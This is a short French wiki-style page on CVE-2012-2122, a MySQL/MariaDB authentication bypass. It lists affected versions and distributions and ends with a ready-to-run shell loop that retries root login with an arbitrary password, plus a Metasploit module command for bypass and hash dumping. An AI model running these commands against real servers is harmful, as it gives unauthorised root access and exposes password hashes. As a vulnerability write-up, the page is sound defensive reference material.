Mysql faille
Aller à la navigation
Aller à la recherche
| Fiche express | |
|---|---|
| CVE | CVE-2012-2122 |
| Type | Contournement d'authentification |
| Cause | Comparaison de hash de mot de passe defaillante |
| Cibles | MySQL / MariaDB 5.1.x - 5.5.x (certaines builds) |
CVE-2012-2122 est une faille de contournement d'authentification de MySQL/MariaDB : sur les versions vulnerables, une comparaison de token erronee fait qu'une meme tentative de connexion finit statistiquement par etre acceptee. En repetant la connexion avec un mot de passe quelconque, le compte root finit par s'ouvrir.
Présentation
Les systèmes suivants sont concernés :
- Ubuntu 64-bit (10.04, 10.10, 11.04, 11.10, 12.04)
- OpenSuSE 12.1 64-bit MySQL 5.5.23-log
- Debian Unstable 64-bit 5.5.23-2
- Fedora 16
- Arch Linux
- MySQL et MariaDB en version 5.1.61, 5.2.11, 5.3.5 et 5.5.22 de façon générale
- au bout de 30 secondes le compte root s'ouvre.
# while /bin/true; do mysql -u root --password=123; done
ou
msf > use auxiliary/scanner/mysql/mysql_authbypass_hashdump